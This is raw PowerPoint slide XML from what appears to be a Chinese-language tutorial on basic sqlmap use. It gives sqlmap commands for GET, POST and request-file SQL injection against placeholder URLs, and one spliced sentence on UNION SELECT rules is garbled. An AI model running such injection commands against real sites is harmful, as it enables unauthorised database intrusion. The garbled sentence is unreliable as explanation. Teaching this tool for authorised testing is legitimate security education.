                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA06EC0E-0CC2-4700-8DC5-8BB52B6B95CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2627122" y="2308477"/>
            <a:ext cx="5245986" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-h,–help  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>显示基本帮助信息并退出</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>hh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>显示高级帮助信息并退出</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9938FBF9-8C06-497F-B58C-B4A3CF31871E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777379" y="1846812"/>
            <a:ext cx="1557448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>帮助信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F1723A-510B-4CB3-A962-16151C726573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="777379" y="3487693"/>
            <a:ext cx="1557448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>简单使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="矩形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA8CAE68-55E3-4F1A-9416-07732409140A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1473200" y="4041087"/>
            <a:ext cx="8469790" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方式的注入：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>  /--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="矩形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99F67F9F-3D34-4DE7-9821-23880DD53F9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2100195" y="4549523"/>
            <a:ext cx="8348822" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>python2 sqlmap.py -u "http://xxxxx/xxx.php?id=1"</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EC0BA14-D2C6-4BB4-A21E-2000DC199719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1473200" y="5287943"/>
            <a:ext cx="8469790" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方式的注入：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>--data=DATA</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFADD0FE-1FF1-46D8-8BF1-E4E917CACE2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2160678" y="5860645"/>
            <a:ext cx="9824175" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>python2 sqlmap.py -u “http://xxxxx/xxx.php”   --data=“id=1”</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3328012782"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>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a:t>UNION </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内部的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>语句必须拥有相同数的列。列也必须拥有相似的数据</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>类型。同时，每条 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>句把用户输入的数据当代码执行，这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据中的列的顺序必须相同。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" spc="600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="034581"/>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="组合 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B73F94C-56E8-4838-B55D-D266938D73E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6335090" y="347084"/>
            <a:ext cx="5427920" cy="708964"/>
            <a:chOff x="668080" y="698156"/>
            <a:chExt cx="5592043" cy="1016344"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABBE8C0-A59E-448A-B0CA-DB618E0631FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5613564" y="698156"/>
              <a:ext cx="646559" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F2D4AA"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形: 圆角 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59C1A43-258D-4810-BCBC-FBE5A4155111}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="668080" y="698156"/>
              <a:ext cx="5099674" cy="1016344"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 0"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="475574"/>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pc="600">
                <a:solidFill>
                  <a:srgbClr val="034581"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="文本框 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D325D91C-7E6F-4BB8-837B-06D7EEFC0629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="602450" y="549215"/>
            <a:ext cx="5304026" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>Sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0"/>
              <a:t>的简单使用</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94F1723A-510B-4CB3-A962-16151C726573}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="665175" y="1520680"/>
            <a:ext cx="1557448" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>简单使用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="矩形 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EC0BA14-D2C6-4BB4-A21E-2000DC199719}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1406281" y="2078050"/>
            <a:ext cx="8469790" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Post</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>方式的注入：  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-r </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>内容为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求的文件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="矩形 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BFADD0FE-1FF1-46D8-8BF1-E4E917CACE2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1406281" y="2709408"/>
            <a:ext cx="4500195" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>例：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>python2 sqlmap.py -r a.txt</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD68E3D0-5CF0-4E74-A0CD-6B77C9CAE94B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4500979" y="3283422"/>
            <a:ext cx="7283172" cy="2958187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1859294653"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition spd="slow" p14:dur="3500">
        <p:random/>
      </p:transition>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition spd="slow">
        <p:random/>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DFB0F556-322F-4195-A26F-D450CB32EDBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-46653" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
            <a:chOff x="349955" y="1137356"/>
            <a:chExt cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="组合 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A3BA2E8-15E4-49CF-8527-10DF42B34BFB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="349955" y="1137356"/>
              <a:ext cx="12192000" cy="3429000"/>
              <a:chOff x="349955" y="1137356"/>
              <a:chExt cx="12192000" cy="3429000"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="6" name="图片 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C954BF19-1EB9-4D05-8091-63E424CB6D0E}"/>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349955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="7" name="图片 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9599D275-CA36-41A2-8DB6-ECB9A1C0FE9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6445955" y="1137356"/>
                <a:ext cx="6096000" cy="3429000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </p:grpSp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="4" name="图片 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA29A3A-9B30-4E90-86BC-7279374CFA7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349955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="5" name="图片 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1758681A-DE36-4659-817E-92F14A73E024}"/>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6445955" y="4566356"/>
              <a:ext cx="6096000" cy="3429000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="矩形: 圆角 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E5B8900-D99B-4021-B8B4-486AD244BDFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534647" y="424690"/>
            <a:ext cx="11315141" cy="6008620"/>
